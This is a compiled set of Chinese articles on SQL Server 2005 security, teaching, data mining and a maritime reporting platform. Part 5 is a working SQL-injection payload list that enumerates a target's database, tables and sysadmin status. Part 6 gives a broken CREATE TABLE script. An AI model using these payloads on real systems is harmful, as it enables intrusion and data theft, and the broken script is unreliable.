SQL2005数据库

2024-08-27

SQL2005数据库（精选十篇）

SQL2005数据库篇1

1 登录账户管理

登录用户的身份验证是SQL Server2005安全管理的第一道关。当用户访问数据库服务器时, SQL Sever2005系统会对用户的身份进行验证。验证成功的用户方可允许连接访问SQL Server实例, 验证失败的用户无法访问服务器。对于登录用户的不同情况, SQL Server2005提供了两种身份验证模式:windows身份验证模式, 及windows身份验证和SQL Server身份验证共同作用的混合模式。

1.1 windows身份验证模式

SQL Server2005利用与windows操作系统出自同门的优势, 允许用windows操作系统的帐户验证作为SQL Server2005数据库系统的登录验证。SQL Server数据库服务器中可以保存受信任的windows系统用户账户, 当用户以windows身份验证模式登录数据库服务器时, SQL Server回叫windows系统以获取该用户的windows系统账户信息, 检查该windows账户是否是已保存的受信任账户, 以决定该用户是否可以登录数据库服务器。在windows身份验证模式下, 用户不需要输入账号、密码, 只要是特定的受信任windows用户就可以直接登录服务器。

1.2 混合验证模式

混合验证模式即windows身份验证模式和SQL Server身份验证模式共同验证。在混合验证模式下, 受信任的windows用户可以使用windows身份验证模式登录数据库服务器;而对于非受信任windows用户或非windows系统用户, 数据库服务器可事先注册保存相应的登录账户名和密码, 这部分用户在登录时须选择SQL Server身份验证, 通过输入用户名和密码进行验证。混合验证模式比windows身份验证模式增加了安全性方面的选择。

2 数据库用户管理

SQL Server2005安全管理的第二道关是数据库用户的管理。拥有登录账户的用户虽然可以登录数据库服务器, 但登录后, 只能访问SQL Server实例中的四个系统数据库, 而并不具备访问实例上已有的用户数据库的权限, 即无法访问实例上的数据。若需要使登录的用户访问某个数据库中的数据, 则必须为其登录账户创建该数据库的数据库用户。让登录账户成为数据库用户称为“映射”。一个登录账户可以映射多个数据库用户, 而一个数据库用户只对应一个登录账户。数据库用户须在相应数据库中创建, 必须与一个登录名相关联。

用户登录服务器后, 当其试图访问实例上的某个数据库时, 系统会在该数据库的系统表sysusers中查找该登录账户对应的数据库用户名。若该登录账户没有映射任何数据库用户, 则系统将其统一映射为默认的Guest用户。但如果该数据库没有Guest用户或Guest用户没有设置任何权限, 该用户就无法访问数据库。

3 数据库用户的权限管理

3.1 SQL Server2005权限种类

SQL Server的权限种类包括对象权限、语句权限和隐含权限。

3.1.1对象权限:是指用户对数据库中表、视图等对象的操作权。主要包括SELECT、INSERT、UPDATE、DELETE等语句权限。

3.1.2语句权限:是指是否允许执行数据定义语句的权限。包括:CREATEDATABASE、CREATE TABLE、CREATEVIEW、CREATE DEFAULT、CREATE FUNC-TION、CREATE PROCEDURE、CRAETERULE、BACKUP DATABASE、BACKUP LOG等。

3.1.3隐含权限:是指由SQL Server预定义的服务器角色、数据库角色、数据库拥有者和数据库对象拥有者所具有的权限。如数据库对象拥有者可以对所拥有的对象执行一切活动, 拥有表的用户可以查看、添加或删除数据, 更改表定义, 或控制允许其他用户对表进行操作的权限。

3.2 部分数据库对象的常用权限 (见表1)

3.3 使用数据库角色管理用户权限

SQL Server2005中的数据库角色分为两类, 一类是系统默认的固定数据库角色, 另一类就是由用户自己创建的自定义数据库角色。固定数据库角色自动包含于每个新创建的数据库, 一共有10种, 见表2所示:

管理员可以根据用户对操作权限的需求分配其到固定的角色中, 也可以自建新的数据库角色并授予相应的权限从而满足特定的权限需求。

4 结语

保证数据库安全是数据库系统设计和管理的重中之重。SQL Server2005提供了全方面多层次的安全保护措施。合理地设置各层次的安全服务措施, 制定切实有效地安全管理策略, 不但可以提高数据库的管理效率, 更保障了数据库中数据的安全。

摘要：SQL Server2005是当今应用最为广泛的关系型数据库管理系统, 采用何种安全保护措施, 保证数据库安全, 阻止对数据库的非授权访问是其须重视的问题。本文介绍了SQL Server2005所采用的多级安全机制, 分析其特点及作用。

关键词：SQL Server2005,数据库安全

参考文献

[1]施伯乐, 丁宝康, 汪卫编.数据库系统教程[M].北京:高等教育出社.

SQL2005数据库篇2

近日，根据微软的一篇文章介绍，在微软的下一代服务器操作系统Lonhorn和微软的WindowsVista中只支持SQL Server 2005 SP2，

微软称，这样做是为了给客户提供更安全的产品。早期版本的SQL Server，包括SQL Server 2000(所有版本，包括企业版、桌面版等)、SQL Server 7.0、和SQL Server 6.5等均不再支持。

使用早期版本SQL Server的应用程序的用户，如果想使用新的操作系统，要开始考虑测试和升级到SQL Server 2005了，这一新数据库将可以充分利用未来操作系统的安全功能。

责任编辑吴北 jiaoxq#51cto.com TEL:（010）68476636-8004

SQL2005数据库篇3

【关键词】教学模式；行动导向；五位一体

【中图分类号】G640

【文献标识码】A

【文章编号】1672—5158（2012）10-0034-01

一、课程定位

《SQL　Server　2005数据库设计》是软件技术专业的一门核心课程。是软件技术专业培养方向中，JAVA程序员、NET程序员、数据库管理员、信息系统管理员、软件测试员等所必须掌握的数据库知识学习，重在培养学生对SQL　Server2005数据库的操纵与设计的能力。开设于新生入学第一学期，后续课程有C#程序设计、ASENET程序设计、JAVA程序设计、J2EE程序设计、ORACLE数据库设计等。它对后续两线课程都起着重要的支撑作用。是一门处于重要地位的职业基础课程。

二、课程设计的整体思路

课程以企业用人为依据、以提升职业能力为目标，针对岗位群所需解决的工作任务为导向进行基于工作过程的课程开发。按照由简单到复杂分划分为7个学习情境，数据库基础、安装与配置、基本操作入门、数据库编程、数据库高级操作、前台语言访问后台数据库、数据库综合设计。每个学习情境又根据工作任务的独立和先后连贯性分解为子情境，每个学习情境或子情境下对应一个或多作实训任务。即全程共有18实训任务，3个综合实训任务。而且随着课程的深入将会出现新的项目载体如（图书馆管理系统），以培养学生对非教学过程中的数据库进行操作和设计的能力，直至数据库综合设计阶段，将会出现更多个实际项目载体，通过组建项目开发团队，要求学生通过分工配合，完成对项目的需求分析，系统功能的确定，并能根据功能和业务规则对所选项目的数据库进行分析与设计。培养学生的职业能力、职业意识，从而为实现与就业岗位“零距离”奠定良好的基础。

三、课程教学的组织与实施

1、教学模式的探索

在教学中尽可能本着突出职业导向，以学生为主体，突出能力训练为原则，在教学、教改中慢慢摸索、不断实验，总结出了该门课程的教学组织模式：基于行动导向的教、学、做、训、评合一的一体化教学模式。实现了课上有考核，课下有任务训练的新的高职教育评价要求。在实际运作中教学环节分为五大步骤：即预习与探究——做与导——查与训——考与评——巩固与拓展。

单元课程中，由于在网络机房授课，一人一机，借助凌波多媒体教学软件，不但可以充分实现在做中学，在学中教，增加了训（查与训）、评（考与评）环节，即实现了在做中训、在训中考，在考中评。不但实现了“教学做合一”，而且能达“教、学、做、训、评五位一体”。

2、教学方法和手段的运用

示范法、分组法、鼓励法、讨论法、对比法，典型案例法、设问法将贯穿整个课程单元教学之中。但是对于不同的学习情境的学习，为能够突出重点，突破难点，培养学生各方面能力可恰当选用行动导向的教学方法，除了学习情境1-6，采用了任务驱动、项目引领教学法外，学习情境7综合数据库设计主要采用情境模拟法。

在软件行业，一个项目的开发，是由一个软件开发团队共同配合完成的。在该门课最后一个情境一一数据库综合设计中模拟实际职业工作进行教学，在学生中构建多个项目开发团队，进行角色分配。如项目经理，项目助理，程序员（即对应组长、副组长，成员）组织教学和实施，在项目总监（教师）的调控、监督指导下，各项目组成员分工配合，共完成一个管理信息系统的需求分析任务，并进行数据库分析与设计工作。在这个过程中，不但让学生对课程的教学内容有一个全面的复习、巩固和提高，同时会培养学生进行数据库的分析与设计能力，初步体会软件开发工作中的最重要的一部分（需求分析所做的工作），也能让学生在学校的环境氛围中对自己未来的职业岗位有一个比较具体的、综合性的理解，有利于学生全面职业素质的提高。为了保障这一环节顺利实施，效果有保证，教改组制定了多项规章，并形成文件，如《项目小组划分原则》文件、《各岗位职责》文件、《项目验收与答辩要求》文件和一系列的过程监控文件和激励办法等，使学生在团结协作中收获了知识、积累了经验、提高了动手能力、增强了就业力。但学生模拟实际工作中也难免会暴露一些个人弱点，如胆小，协调能力较差、团队意识较弱等。但最终在老师和同学的帮助下能够意识到不足，并加以改正，最后同样收获了成功和喜悦。

四、实践教学效果

课程组的授课教师，经验丰富、技能娴熟、加之以德高身正，教学方法得当，深受学生爱戴和好评。在院、系举行的《sQLSever2005数据库设计》公开教学中曾多次得到学院督导处、教务处领导及系部老师的一致肯定，曾获“一创新、二特色、三突出”好课的评价；学生项目小组在此门课的学习后结合一门开发语言，开发设计了多项小型的应用管理系统软件，和网站。本课程的精品课程申报网站和网络课堂，就是项目小组同学第三学期的一项作品。课题组老师曾带领学生多次参加各类省级职业技能大赛荣获一、二等奖。

五、课程特色

1、教学模式有特色

《SQL　Server　2005数据库设计》采用了基于行动导向的教学模式，且实现了教、学、做、训、评五位合一。形成师生之间的良性互动，增强了教学效果，学生活学活用的能力充分展示出来，培养了学生的创新能力。

2、教学方法有特色

课堂教学使用的教学方法中，任务驱动法、情境模拟法、项目引领法都是属于行动导向教学法。其中情境模拟法，轻松实现了企业工作环境与课堂教学环境的高度融合，实现与就业零对接。如今黑龙江农垦职业学院软件技术专业其他课程也正借鉴此教改成果，在教学中逐步推广和使用。

3、教学手段有特色

课程的教学课件均使用思维导图软件（Mind　Manager）制作，结构清晰，动感性强。使学生的思维紧密跟随着教师，同又有思维的发散，开发锻炼了学生的右脑机能。在线考试系统和网络课堂的开发实现了教学同步，提高了效率，也为学生业余自学提供了保障。

4、考核评价方式有特色

SQL2005数据库篇4

考试院现有基本数据以文本形式、Excel文件、oracle文件形式存在,这些构成了以OLAP分析为目的的数据仓库的异构数据源。为方便数据挖掘,通过识别、转换、数据导出/导入等手段把统一整理好的数据加载到SQL 2005 BI STUDIO以备挖掘。

针对要分析的变量,运用聚类和关联分析两种挖掘算法建立数据挖掘模型。已采集到的会考成绩里,总计有16个科目。如果想评价学校的全面教育情况,则需要在建模时将所有课程加入到挖掘模型中进行研究。

在实际挖掘中我们会发现,像体育、信息、艺术、物理实验、化学实验、生物实验、劳动技术等科目如果和其他科目放在一个挖掘模型里,在做聚类和关联分析时需要处理的数据量太大,而且会影响聚类和关联分析后的效果。联系到实际教学过程中,这些课程并不占有重要地位,因此在实际挖掘时已考虑将这些去除掉,创建了比较实用的会考成绩评价模型U nion＿cluster及Union＿Association,包含语文、数学、外语、政治、历史、地理、物理、化学、生物等科目,分别用于聚类分析和关联规则分析。

其中的关联规则分析模型为:

另外,针对高考的指挥棒现象,我们在系统当中也考虑到了会考以后文理分科的问题,为了使得会考成绩分析后能更加有效的反馈于教学,服务高考,在建立挖掘模型的时候又针对文理进行了分类,其中文科成绩挖掘模型Arts＿cluster及Arts＿Association含语文、数学、外语、政治、历史、地理(文综)等科目,分别用于聚类分析和关联规则分析。

理科成绩挖掘模型Science＿cluster及Science＿Association,含语文、数学、外语、物理、化学、生物(理综)等科目,分别用于聚类分析和关联规则分析。

其中利用聚类分析的理科成绩挖掘模型Science＿cluster为:

数据处理与模型评估

(1)聚类算法:

以市、区、学校或班级为处理单元,根据考生主要科目成绩,对考生进行聚类分析,可以将学生划分成不同的类别,依次观察不同群体学生体现出的特点。

以美亚学校的考生为例,选用会考成绩评价模型进行聚类分析,可得到图1的学生聚类图。

(2)关联规则挖掘算法:

通过取得的结果分析,我们可以发现这样一些规则:

1.物理=优地理=优→语文=优

2.政治=优物理=优→数学=优

3.外语=及格化学=及格→数学=及格

4.生物=优历史=及格→语文=及格

5.物理=优历史=及格→语文=及格

把这些分析与中学教学结合起来,应用到实际,与教育上的一些基本现象吻合:

1.优秀的同学文科、理科成绩都会比较好

物理=优地理=优→语文=优

政治=优物理=优→数学=优

2差生的各科成绩都不理想

外语=及格化学=及格→数学=及格

3.各科目成绩不一的同学,也就是通常我们所说的偏科生里,科目之间会存在某种关联关系,以语文成绩为例:

生物=优历史=及格→语文=及格

物理=优历史=及格→语文=及格

从这样两条关联规则中可以看到,历史成绩与语文成绩存在较大的关联关系,如果想改善学生的语文成绩,就要同时考虑历史与语文之间的互动关系。

在文科成绩挖掘模型得到的结果里我们可以看到类似的情况:

语文=及格地理=及格一外语=及格

语文=及格外语=及格→地理=及格

这表明在语文成绩较差的前提下,地理和外语关系密切,改善这部分考生的学习成绩就要根据他们成绩体现出的特点有所侧重,不同老师之间可以加强合作与互动。因此,借助数据挖掘,本系统有助于全面的分析一个班级、学校、行政区域的学生的成绩状况,对中学教学质量的提升具有高度的实际意义,教学中可利用数据挖掘得出的结果针对学生的特点进行帮助和教育,以此取得理想的转化效果。

摘要：本文的主题是数据挖掘在中学会考数据分析中的应用研究。根据考试院的会考指标体系建立了应用框架，从各个角度对数据进行分析，建立了多个挖掘模型，通过对会考成绩的分析，探索科目之间的联系，反馈于教学，为考试院的相关决策提供依据。

关键词：数据仓库,联机分析处理,数据挖掘,中学会考

参考文献

[1]邝祝芳，焦贤龙，高升．数据挖掘原理与应用-SQL Server 2005数据库．清华大学出版社．2007．1：90-116

[2]董福贵，李存斌．SQL Server 2005数据库简明教程．电子工业出版社．2006．9：30- 45

SQL2005数据库篇5

ID=1458%20and%20@@version%3D0 判断版本

ID=1458%20and%20db_name%28%29%3D0 数据库名

ID=1458%20and%20@@servername%3D0 服务器名

ID=1458%20and%20system_user%3D0 系统用户名

D=1458%20and%20user%3D0 权限/DBO OR PUBLIC

ID=1458%20and%20quotename%28is_srvrolemember%280x730079007300610064006D0069006E00%29%29%3D0 是否sysadmin,1是0否

ID=1458%20and%20quotename%28db_name%281%29%29%3D0 判断数据库

ID=1458%20and%20quotename%28db_name%282%29%29%3D0

ID=1458%20and%20quotename%28db_name%283%29%29%3D0

ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2032%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0

ID=1458%20and%20%28select%20top%201%20quotename%28name%29%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%20AND%20name%20not%20in%20%28select%20top%2033%20name%20from%20Digicom.dbo.sysobjects%20where%20type%3Dchar%2885%29%29%29%3D0

解密之后就是:

ID=1458 and (select top 1 quotename(name) from Digicom.dbo.sysobjects where type=U AND name not in (select top 33 name from Digicom.dbo.sysobjects where type=U))=0

下面是pangolin的:

/add_item.asp?ID=1458%20and%200<(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([filename]%20as%20nvarchar(4000))%20from(select%20top%20%201%20dbid,name,filename%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1

得到数据库文件的路径.

-------------------------------------------------------------------------------------------------------------------------------------------------------------------

清除SQL2005的下拉列表中的地址

SQL是在HKEY_CURRENT_USERSoftwareMicrosoftMicrosoft SQL Server80ToolsClientPrefServers

SQL2005数据库篇6

关键词：微信平台危防三化建设

0 前言

随着网络与数字通信技术的飞速发展，应用的数据再也不是存储在一个单一的场地，而是可能分布在全球的任何位置。对这样由多个分散数据库组成的管理信息系统，如何以最小代价将其整合成分布式数据库系统也就成为迫切需要解决的问题[1]。自2011年以来，受全球经济和国际贸易复苏缓慢、运力增长加快的影响，航运市场整体低迷。面对后危机时代全球经济贸易金融的很多不确定性，航运业要在艰困的经营环境中走出“寒冬”，迎来下一轮景气，必须采取积极措施，实现行业的均衡与突破。

目前，传统的海事主管的危防业务在作业前，都需要服务相对人按要求提前进行网上申报，经审核同意后，在海事部门进行现场检查合格后，方才可进行作业。作业周期长，消耗时多，运行成本高，作业效率低。为深入贯彻落实《关于加强全国海事系统“革命化、正规化、现代化”建设的意见》（以下简称《意见》），提高海事执法效率，提升海事服务水平，方便行政相对人，杨浦海事局（以下简称“我局”）以问题为导向，以面向航运、服务港航、走近船民、服务群众为基点和归宿，以创新为驱动，以推进“打造责任链，编制安全网”系统工程为手段，借助自身的优势与港航企业“抱团取暖”，按照“前置放开、过程和事后管住”的原则，借用wifi、微信等高效即时通信工具，大力推进以分类为核心的诚信管理机制，研究和开发了“杨浦海事局危防管理微信平台”，完成了对我局危防日常业务的审核、检查通过微信平台进行实施，加速了海事现代化建设的步伐。

1 辖区概述

杨浦海事局承担着自黄浦江高阳路码头1泊位下角与浦东泰同栈轮渡站码头上角联线至107灯浮与草临线轮渡上端联线之间水域及沿江码头、支流港口的水上交通安全监督管理工作，管辖水域长度8.8海里，地处黄浦江中下游，为黄浦江咽喉要道，毗邻上海市市中心。

辖区水域进出口主航道宽约200米，航道狭窄;浮筒38个，占黄浦江浮筒总数的88%;有弯度63度的高桥炼油厂、弯度55度的沪东中华船厂两个大角度弯头;9个影响航道安全的主航道浅点;大型调头区2个，通航环境复杂，形势严峻，安全隐患多。辖区岸线长度39.6公里，作业码头岸线长度28.2公里，两岸经营性码头123家，作业泊位238个，其中危险品码头35家，危险品作业码头泊位70个，拥有油库及化学品库165座，库容量总计79万吨，修造船厂5家，码头容积率高，密度大，港口特性明显，维持秩序压力大，监管十分严峻。

辖区靠离船舶年均30万艘次，过境船舶年均42万艘次，日均通行船舶1200余艘次，涨落潮高峰时段船舶流量高达100余艘次/小时;辖区内贸危险品船舶、内贸散装液态危险货物船舶年进出为9826艘次和7201，分别占上海港的44%和46%，为上海国际航运中心和中国（上海）自由贸易实验区建设起到了重要推动作用。辖区老旧船舶和内河船舶偏多，船员素质参差不齐，为安全生产带了安全隐患。

辖区是城市配套的工业品、生活用品中转及制造业基地之一，是上海能源水运基地，是上海港服务华东四省一市的能源保障江海联运主要基地，石油、煤炭、化工等国计民生物资运输量和过境船舶流量巨大。油运：辖区内既驻有上海炼油厂（该厂是上海市国Ⅳ汽油炼制和供应的唯一基地）等大型石化炼制企业，同时也是我国中石化、中石油等大型国营油品企业的

华东销售调运基地，南京军区联勤部、海军上海基地等的油料调运中心，以及上海港船舶燃料供应服务企业和船舶的主要基地。年油船装卸、运输16000余艘次，合600万吨;船舶燃料供应和油污水船舶垃圾接收备案单位22家55艘船舶，年供受油和油污水接收2000余和600余艘次，作业量分别为90000吨和5000余立方米;船舶油品运输装卸现场监管和围油栏布设2938艘次占全局总量的41%。煤运：辖区内有上港集团煤炭分公司朱家门码头和浦东煤气厂煤炭、焦炭水运和转驳大型码头设施，年煤炭运输船舶17000余艘次1100余万吨。矿物性建筑材料：辖区矿物性建筑材料年吞吐量462万吨、钢材年吞吐量1，554万吨，分别占上海港57.87%和36.5%，为上海市的基础建设发挥了巨大的作用;

2 系统组成

重要的地理位置，复杂的航道通航环境，繁忙的作业码头，巨大的货物流量和船舶交通流量，我局辖区安全通航环境趋于紧张，潜在风险不容低估;然而核编转制后，我局从事危防业务管理的执法人员仅8人，监管能力与辖区现状不匹配。因此，打破传统模式的监管模式，推行满足“三化”要求的现代化监管模式势在必行。为此，我局研究开发了“杨浦海事局危险品管理微信平台”（以下简称“微信平台”），改变了重“事先审批”、轻“事中或事后监管”的传统管理模式，缓解防污染作业监管任务繁重与现场执法人力资源不足的矛盾，加速海事现代化建设进程，确保辖区危险品水上运输安全。

“危防管理微信平台”系统主要借助传统聊天工具——微信，并将其作为该系统的操作入口服务工具，具有业务执行、数据统计分析、用户管理等功能。主要包括现场执法人员所持移动通讯设备、微信平台、动态数据库、后台专业监管人员四部分组成，工作原理如图1。港航企业单位向我局危管防污处提出书面申请后，经我局专门负责人员审核通过与我局签订微信平台传输照片、视频实时性《承诺书》，并经我局组织的相关培训合格后，获得微信申请报备资质，通过微信平台进行申请，获得我局管理平台审核人员校验成功、绑定”关系，通过专门的服务器进行解析后，方才被我局危防管理平台系统识别，并经过我局专门的审核人员业务处理后，返回给客户智能移动终端。

nlc202309051612

3 系统的开发

3.1数据库开发

SQL Serve 2005是微软的新一代数据管理和分析解决方案的大型数据库系统，它给企业级应用数据和分析程序带来了更安全、更稳定和可靠，使得它们更易于创建、部署和管理，从而可以在很大程度上帮助企业做出更快、更好的决策，提高开发团队的生产力，以及在减少预算的同时，更好地满足多种需求[2]。基于的数据库应用系统的性能包括系统的响应时间、吞吐量、系统的并行处理能力等。从数据库设计、查询结构、并行处理、客户服务器模式、应用编程等方面进行优化调整，可以有效地提高系统的性能。

同时，SQL Serve 2005数据库还具有NET框架主机、XML技术、ADO. NET2.0版本、增强的安全性、Transact-SQL的增强性能、SQL服务中介、通告服务、Web服务、报表服务、全文搜索功能的增强等十大特点，更便于系统的开发。同时，通过采用了启用防火墙系统过滤指定端u访问、配置服务启动账户提高系统的安全性。

目前，我局开发了船舶“供受油作业”、“船舶污染物接收作业”、“围油栏布控”、“浮船坞沉坞作业”等业务的电子检查模块。以船舶供受油作业为例，具体介绍数据库的开发。该系统数据库名为“ypmsa”， “供受油作业”为“gsy”，分区键为sdept，分区键必须是主键的一部分，具体构建数据库系统如下：

create database ypmsa

go （

use ypmsa

create table gsy

sno nvarchar（10） not null

scompanyname nvarchar（40）not null

sdep nvarchar（2）not null

company passage nvarchar（2）not null

company telephone int not null

constraint pk_ gsy

Primary key（ sno， sdept）

constraint uq_ gsy_sno

unique（sno）

Constraint chk_ gsy_sno_sdept

Check（cbgy=‘CS’）

3.2新功能开发

该系统在传统微信的基础上，根据海事业务需要，新开发了三项功能：第一，信息上传保存功能。港航企业通过微信平台进行作业申报，并严格按照《上海海事局电子检查要求》，将作业信息和相关图片上传至后台管理系统，我执法人员进行对作业信息进行审核和维护操作。第二，信息查询功能。受黄浦江潮涨潮落的作业环境的限制，通过该功能的开发，减少了港航单位作业等待的时间，实现24小时内任何时间受理作业申请，大大提高了作业效率，为企业节省了很大人力和财力，间接助推了港航单位的发展，同时也方便海事执法人员进行信息查询和比对。第三，自动信息统计功能。根据海事管理需求要，该系统可按照作业申请的时间、数量、审核结果等多维度进行业务信息统计，并出具图形化报表进行展示，供我局进行分析和决策，大大加速了工作的效率，促进了海事现代化的建设。

4 系统优点及在现场执法过程中的应用效果

4.1系统开发的优点

第一，改变了重“事先审批”、轻“事中或事后监管”的传统管理模式，树立了“船民本位”的安全监管理念，加快融入上海国际航运中心建设步伐，顺应了中国（上海）自由贸易实验区的建设环境;第二，设备投资少，运行成本低，营运维护费用少，操作便捷，便于大范围的推广和应用;第三，实现了将现场执法检查转化为远程电子检查的跨越，即时传输，实时播放，大大提高了行政效率，便利了企业生产，支持了港航企业的发展;第四，系统不受环境、气候条件干扰，性能稳定，可靠性强。第五，现场作业的照片及视频资料作为档案进行保存，可追溯强。第六，突出了企业安全生产的主体地位，减少了海事对企业生产的干预，深化了诚信管理机制的建设。第七，减少了执法人员登轮执法的次数，减少了与服务相对人接触的机会，大大提高海事执法人员廉政风险防控系数，降低了廉政风险，树立了海事的良好形象。

4.2系统在现场执法过程中的实践效果

微信平台系统整体投资少，运行成本低，营运维护费用少;不受环境、气候条件干扰，性能稳定;界面设计人性化，操作便捷，便于大范围的推广和应用。自2013年9月平台开通以来，共完成危防业务如下：船厂残油油污水接收作业113 次，沉船坞作业168次，供油作业174 次（主要选择“海供油4”和“航供油驳8”提供），垃圾接受作业112次，生活污水接受作业371次，围油栏作业300次（主要是上海环生船舶服务有限公司）。

执法人员通过微信平台审核实时传输的危防作业申报现场照片，实现了对危防现场作业关键点及时有效的控制;借助世博水上管理系统，实时确认被核查船舶准确位置;通过现场抽查，对传输照片真实性进行核查。借助危防现场检查微信平台、世博水上安保管理系统和不定期的抽查方式，杨浦海事局有效加强对我辖区危防作业的“事中、事后管理”。截至2014年8月31日，我局累计对申报单位开展现场抽查32次，未发现过瞒报、谎报等弄虚作假的行为，现场安全防污措施均按我局要求落实。

以辖区中海工业有限公司立新船厂码头“浦东坞”浮船坞作业检查为例，申报人员通过网上在“船舶动态管理系统”上申报后，我局危防处立即进行指派，按照要求，2名海事执法人员5分钟准备好执法工具后，驾乘执法艇离开局趸船码头，35分钟左右后到达现场进行检查，执法时间一般为15-20分钟。经检查合格后，执法人员通过800兆高频报局指挥中心，然后由指挥中心告知政务中心进行审核确认，然后浦东坞才可以进行进出坞进行作业，整个过程需要时间1小时左右。自我局实施微信平台以来，累计为服务对象节省作业等待时间950余小时，为企业节省近200余万元，对航运企业的发展起到了积极的支持和助推作用，受到港航企业的一致好评。累计减少出动执法力量2500余人次，减少出动巡逻艇或执法1200余次，减少执法艇油耗费用50余万元，大大提升了执法效率。

5 结束语

为民服务、为港航服务是一个永恒不变的主题，危防微信平台成功开发和应用，实现了与船舶管理系统、EDI系统等多个应用系统有机结合，借助AIS系统平台定期进行统计、分析和评估，建立起对船舶的动态监管模式。是我局深入开展群众实践活动与“四型海事”活动的共同成果，对我局推进的“三化”建设有重要启示，真正体现了“全心全意为人民服务”的宗旨，真正做到“权为民所用，情为民所系，利为民所谋”，真正践行了“让航行更安全，让海洋更清洁”的海事使命。

参考文献

[1] 曾文全. 基于SQL Server 2000 的分布式数据库的架构[J]. 教育信息化，2006-1，24～25

[2] 杜杏菁. 分布式数据库中复制技术的研究[J]. 华北科技学院学报，2004，1（3），88～91

SQL2005数据库篇7

关键词：SQL Server 2005,安全性,认证模式,加密

微软SQL Server2005是企业级的关系型数据库, 其数据库功能强大易于使用, 操作的图形界面亲切易用, 很多大中型的信息管理系统都采用此数据库, 而大多数系统管员或数据库管理员对安全问题关心太少, 甚至忽略数据库全, 这就使数据库的安全问题变得更加严峻, 事实上数据库的安全性一直是非常重要的, 因为数据库中存储着大量的关键数据, 如果数据库被未经授权的人非法侵入窃取或者破坏, 就会造成不可估量的损失, 这里主要从实际应用的角度, 讨论有关SQL Server2005数据库的安全配置以及一些相关的安全和使用上的问题。

1、安全性概述

数据库的安全性是指保护数据库, 防止不合法的使用所造成的数据泄露和破坏。数据库系统中保证数据安全性的主要措施是进行存取控制, 即规定不同用户对于不同数据对象所允许执行的操作, 并控制各用户只能存取他有权 (操作权力) 存取的数据。存取控制机制分为自主存取控制 (DAC) 与强制存取控制 (MAC) , 主要包括两部分:一是定义用户权限, 并将用户权限登记到数据字典中;二是合法权限检查。

常见数据库的安全性控制技术有:

(1) 用户标识与鉴别。

(2) 自主存取控制 (DAC) :用户对于不同的数据对象有不同的存取权限, 不同的用户对同一对象也有不同的权限, 而且用户还可将其拥有的存取权限转授给其他用户。因此自主存取控制非常灵活。

(3) 强制存取控制 (MAC) :每一个数据对象被标以一定的密级, 每一个用户也被授予某一个级别的许可证。对于任意一个对象, 只有具有合法许可证的用户才可以存取。强制存取控制因此相对比较严格。

(4) 视图:进行存取权限控制时我们可以为不同的用户定义不同的视图, 把数据对象限制在一定的范围内即通过视图机制把要保密的数据对无权存取的用户隐藏起来, 从而自动地对数据提供一定程度的安全保护。视图机制间接地实现了支持存取谓词的用户权限定义。

(5) 审计

(6) 加密:对于高度敏感性数据, 例如财务数据、军事数据、国家机密, 除以上安全性措施外, 还可以采用数据加密技术。

2、MS SQL Server安全性控制技术

MS SQL Server的安全性建立在认证和访问许可两种机制上, 即用户要经过两个安全性阶段:身份验证和授权 (权限验证) 。身份验证阶段使用登录帐户 (login) 标识用户并只验证用户连接MS SQL Server实例的能力。如果身份验证成功, 用户即可连接到MS SQL Server实例。然后用户需要访问服务器上数据库的权限, 为此需授予每个数据库中映射到用户登录的帐户访问权限。权限验证阶段控制用户在MS SQL Server数据库中所允许进行的活动。MS SQL Server的安全模式中包括登陆 (login) 、数据库用户 (user) 、权限、角色 (role) 等。

2.1 登录账号与服务器角色

服务器登录名:指有权限登录到某服务器的用户。使用一个登录名只能进入服务器, 但是不能让用户访问服务器中的数据库资源。每个登录名的定义存放在master数据库的syslogins表中。

服务器角色:指一组固定的服务器用户, 默认有9组, 服务器角色不容许修改。登录名一定属于某些角色, 默认为public, 服务器登录名属于某组服务器角色, 登录后也不一定有权限操作数据库。

(1) 登录模式

SQL Server 2005的身份认证模式是指系统确认用户的方式。SQL Server2005有两种身份认证模式:Windows验证模式和SQL Server验证模式, 图1给出了这两种方式登录SQL Server服务器的情形。

Windows验证模式:用户登录Windows时进行身份验证, 登录SQL Server时就不再进行身份验证。但是必须将Windows账户加入到SQL Server中, 才能采用Windows账户登录SQL Server。如果使用Windows账户登录到另一个网络的SQL Server, 必须在Windows中设置彼此的托管权限。

SQL Server认证模式:在SQL Server验证模式下, SQL Server服务器要对登录的用户进行身份验证。当SQL Server在Windows操作系统上运行时, 系统管理员设定登录验证模式的类型可为Windows验证模式和混合模式。当采用混合模式时, SQL Server系统既允许使用Windows登录账号登录, 也允许使用SQL Server登录账号登录。

【例1】创建SQL Server登录名sql_tao, 密码为123456, 默认数据库设为stu。

CREATE LOGIN sql_tao WITH PASSWORD='123456', DEFAULT_DATABASE=stu

(2) 服务器角色

服务器角色独立于各个数据库。如果在SQL Server中创建一个登录名后, 要赋予该登录者具有管理服务器的权限, 此时可设置该登录名为服务器角色的成员。SQL Server提供了以下固定服务器角色:sysadmin:系统管理员, 角色成员可对SQL Server服务器进行所有的管理工作, 为最高管理角色。这个角色一般适合于数据库管理员 (DBA) 。securityadmin:安全管理员, 角色成员可以管理登录名及其属性。可以授予、拒绝、撤销服务器级和数据库级的权限。另外还可以重置SQL Server登录名的密码。serveradmin:服务器管理员, 角色成员具有对服务器进行设置及关闭服务器的权限。setupadmin:设置管理员, 角色成员可以添加和删除链接服务器, 并执行某些系统存储过程。processadmin:进程管理员, 角色成员可以终止SQL Server实例中运行的进程。diskadmin:用于管理磁盘文件。dbcreator:数据库创建者, 角色成员可以创建、更改、删除或还原任何数据库。bulkadmin:可执行BULK INSERT语句, 但是这些成员对要插入数据的表必须有INSERT权限。BULK INSERT语句的功能是以用户指定的格式复制一个数据文件至数据库表或视图。public:其角色成员可以查看任何数据库。

2.2 数据库用户与数据库角色

SQL Server安全性的第二个层次是对数据库访问的控制。SQL Server可以在一个服务器上支持不止一个数据库, 因此你可以使大多数用户拥有访问一个数据库的权限, 而没有访问其他数据库的权限。

数据库用户:指有权限能操作数据库的用户, 一个或多个登录对象在数据库中的映射, 可以对用户对象进行授权, 以便为登录对象提供对数据库的访问权限。用户定义信息存放在每个数据库的sysusers表中。

